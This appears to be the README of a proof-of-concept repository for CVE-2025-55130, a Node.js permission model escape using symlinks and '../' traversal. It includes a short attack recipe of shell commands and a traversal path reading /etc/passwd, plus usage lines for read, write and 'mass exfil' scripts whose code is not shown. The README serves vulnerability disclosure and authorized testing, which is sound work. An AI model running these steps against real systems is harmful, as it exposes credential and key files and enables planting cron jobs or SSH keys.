# CVE-2025-55130 - Node.js Permission Model Symlink Escape

```
   ___ _   _ ___     ____   ___ ____  ____      ____ ____ _ _____ ___  
  / __| | | | __|___/ _  \ / _ \___ \| ___|    | ___| ___/ |___ // _ \ 
 | (__| |_| | _|___| |_| || | | |__) |___ \ _____|__ \___ \ | |_ | | | |
  \___|\___/|___|   \__  ||_| |_|___/|_____|_____|__) |__) || |__) |_| |
                    |___/                       |____/____/|_|____/\___/ 
                                                                        
        Node.js Permission Model Bypass via Crafted Symlinks
                   [ Discovered by natann @ JFrog ]
```

## Overview

A path traversal flaw in Node.js allows breaking out of `--allow-fs-read` and `--allow-fs-write` 
permission restrictions using symlinks pointing to absolute paths combined with relative traversal.

The permission check and path resolution happen separately. Once the initial path passes the 
permission check, the symlink is followed and traversal sequences escape the sandbox.

## Affected Versions

| Branch | Vulnerable | Patched |
|--------|------------|---------|
| 20.x   | < 20.20.0  | 20.20.0 |
| 22.x   | < 22.22.0  | 22.22.0 |
| 24.x   | < 24.13.0  | 24.13.0 |
| 25.x   | < 25.3.0   | 25.3.0  |

## Technical Analysis

### Root Cause

```
Permission Check:  ./nested/dirs/symlink/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^ ALLOWED (starts with ./)
                   
Path Resolution:   /actual/path/to/script/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
                   Resolves to /etc/passwd - OUTSIDE SANDBOX
```

The permission model validates the path string before symlink resolution. By creating a symlink 
to an absolute path and using `../` traversal AFTER the symlink, we escape the allowed directory.

### Attack Flow

```
1. mkdir -p ./a/b/c/d/e/f/g           # Create nested dirs in allowed path
2. ln -s $(pwd) ./a/b/c/d/e/f/g/x     # Symlink to absolute path  
3. read ./a/b/c/d/e/f/g/x/../../../etc/passwd
         ^^^^^^^^^^^^^^^^^ 
         Permission check passes (inside ./)
         
   After symlink resolution:
   /home/user/project/../../../etc/passwd -> /etc/passwd
   ^^^^^^^^^^^^^^^^^^^^
   Traversal escapes to root
```

## Files

| File | Purpose |
|------|---------|
| `exploit.js` | Main exploit - read arbitrary files |
| `exploit_write.js` | Write arbitrary files |
| `exfil.js` | Mass file exfiltration |
| `check.js` | Version vulnerability check |

## Usage

```bash
# Basic exploitation
node --permission --allow-fs-read=. --allow-fs-write=. exploit.js

# Check if vulnerable
node check.js

# Mass exfil
node --permission --allow-fs-read=. --allow-fs-write=. exfil.js
```

## Impact

- Read sensitive files: /etc/passwd, /etc/shadow, SSH keys, configs
- Write arbitrary files: cron jobs, authorized_keys, configs
- Container escape in multi-tenant environments
- Sandbox bypass for untrusted code execution

## References

- https://research.jfrog.com/vulnerabilities/nodejs-fs-permissions-bypass-cve-2025-55130/
- https://nodejs.org/en/blog/vulnerability/december-2025-security-releases
- https://nvd.nist.gov/vuln/detail/CVE-2025-55130

## Credits

- Vulnerability: Natan Nehorai (natann) @ JFrog Security Research
- Fix: RafaelGSS @ Node.js

---
For research and authorized testing only.
